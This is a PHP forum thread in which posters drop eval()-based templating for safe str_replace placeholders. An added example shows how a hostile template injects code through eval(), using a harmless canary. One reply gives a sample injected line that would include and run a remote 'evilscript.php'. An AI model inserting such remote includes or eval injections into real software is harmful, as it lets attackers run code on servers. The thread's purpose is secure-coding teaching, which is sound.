(PHP) Messin' with eval()

  • rtm223
  • Mastermind
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

ok well I was messing around with eval and came up with this idea:

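PHP Code:
<?php
// The single quotes keep {$index}, {$value} and \" literal at this point;
// they are only interpreted later, inside the double-quoted string built for eval().
$string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   eval('echo("'.$string.'");');
}
?>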
 
 


The idea being that I could write a block of html, and just put in variable names arbitrarily, using the single quotes to not expand the values straight away (because they have not been set :roll: ), or read from a file or db or whatever. Then later expand the variables (using that eval/echo thing) from an array, or different db value (I haven't really thought through how to use it lol).

What I really want to know is has PHP got anything built in to do this sort of thing, or am I just making things more complicated than they need to be? The output can be seen here BTW
  • rjstephens
  • Professor
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm, what is wrong with this:
PHP Code:
<?php
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   // Inside single quotes only \' and \\ are escapes, so the double quotes are written bare
   echo 'this is the '.$index.'th element. It\'s value is "'.$value.'" <br />';
}
?>
 
 


or am I missing the point now?

Anyway, it is a good idea to avoid eval() at all costs because it is very easy for your visitors to insert PHP code into your script (i.e. include('http://domain.com/evilscript.php');, which would be included as if it were from your server).
  • rtm223
  • Mastermind
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

well the point was to keep the string OUTSIDE of the loop for easy editing and customisation. You don't have to sift through the code to alter little bits.

And I thought about the eval situation, but the string would probably be hard-coded into the script. If someone can alter the script, I don't think it matters if I am using eval() or not :P lol. I thought of a useful use also, I'll write an eg when I get to work.
  • rjstephens
  • Professor
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm, the security risk depends on whether or not any of the variables in the eval come from user input. If they do, you have a security risk (unless you are VERY careful to properly escape them and such).

If your motivation is easy editing, then do something like this:
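PHP Code:
<?php
// [INDEX] and [VALUE] are plain placeholders; nothing in this string is ever executed.
// Inside single quotes only \' and \\ are escapes, so the double quotes are written bare.
$string = 'this is the [INDEX]th element. It\'s value is "[VALUE]" <br />';
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
    echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
}
?>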
 
 
  • rtm223
  • Mastermind
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

rjstephens wrote:
rtm, the security risk depends on whether or not any of the variables in the eval come from user input.


*slaps self.

Thank you rjstephens, that makes an awful lot more sense, I didn't think this through very well. I'll just do it with a preg_replace() on all of the vars.

Thanks for pointing out the error of my ways :lol:

//edit, not preg_replace, because str_replace can take arrays:

PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);

foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>


Thanks again RJ, can't believe I didn't think of that. I think I'll just stick to never using eval() in PHP. Ever.

Now all I need to do is find a use for the code :roll:
  • rjstephens
  • Professor
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm223 wrote:
*snip*
PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");
 
$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);
 
foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>

*snip*


RTM, now I'm slapping myself, I should have thought of that.

//edit
while we're making the code as simple as possible, why not
PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   // Search and replacement arrays are passed inline; no intermediate variable is needed
   echo(str_replace(
         array(
            "[INDEX]",
            "[VALUE]"
         ),
         array(
            $index,
            $value
         ),
         $string
      )
   );
}
?>
 
 



of course, without all the tabs
  • rtm223
  • Mastermind
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

Noooo, I say keep the tabs. No tabs does my head in lol. It's easier to make sure that the elements match in case you are a dufus like me. It looks kinda ugly if you take out the whitespace:
PHP Code:
echo(str_replace(array("[INDEX]","[VALUE]"),array($index,$value),$string));

I think that would start looking quite nasty with more than a couple of vars.... Maybe a compromise lol:
PHP Code:
$string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   echo(str_replace(
      array("[INDEX]","[VALUE]"),
      array( $index  , $value),
      $string)
   );
}
 
 

is looking nice and neat to me :D
Thanks again rjstephens.

//edit
ooooh, without the eval it is really easy to insert functions or strings with variables inside, as well as just plain old variables.... This is all looking extremely handy to me :)
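
Added example (not code from any poster in this thread): the eval() pattern from the first post run beside the placeholder pattern the thread settles on, with constructed inputs. The names canary, render_eval and render_replace are hypothetical, and strtr() with htmlspecialchars() is swapped in for the thread's str_replace() call.

```php
<?php
// Added example, not code from the thread; every name below is hypothetical.

// Harmless stand-in for injected code: it only records that it was executed.
function canary(): string {
    $GLOBALS['canary_ran'] = true;
    return '';
}

// First post's pattern: the template is spliced into PHP source and evaluated.
// The evaluated string reads $index and $value from this function's scope.
function render_eval(string $template, int $index, string $value): string {
    return eval('return "' . $template . '";');
}

// Placeholder pattern from the later posts, with two substitutions (assumptions):
// strtr() never rescans text it has just inserted, and htmlspecialchars()
// escapes each value before it reaches the page.
function render_replace(string $template, int $index, string $value): string {
    return strtr($template, [
        '[INDEX]' => (string) $index,
        '[VALUE]' => htmlspecialchars($value, ENT_QUOTES, 'UTF-8'),
    ]);
}

// Constructed inputs: a template that closes the string literal early, and a
// value that carries markup plus a placeholder of its own.
$hostileTemplate = 'element {$index}" . canary() . "';
$hostileValue    = '<script>[INDEX]</script>';

$GLOBALS['canary_ran'] = false;
render_eval($hostileTemplate, 0, 'cool');
echo 'eval, hostile template: canary ran = ', var_export($GLOBALS['canary_ran'], true), "\n";

$GLOBALS['canary_ran'] = false;
echo 'eval, hostile value:    ', render_eval('value is {$value}', 0, '" . canary() . "'), "\n";
echo '                        canary ran = ', var_export($GLOBALS['canary_ran'], true), "\n";

$GLOBALS['canary_ran'] = false;
echo 'replace, hostile template: ', render_replace($hostileTemplate, 0, 'cool'), "\n";
echo 'replace, hostile value:    ', render_replace('[INDEX]: [VALUE]', 0, $hostileValue), "\n";
echo '                           canary ran = ', var_export($GLOBALS['canary_ran'], true), "\n";
```

With eval() the template itself is PHP source, so the canary runs when the template is hostile but not when only the interpolated value is; that value still reaches the page unescaped. The placeholder version treats both template and value as data.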
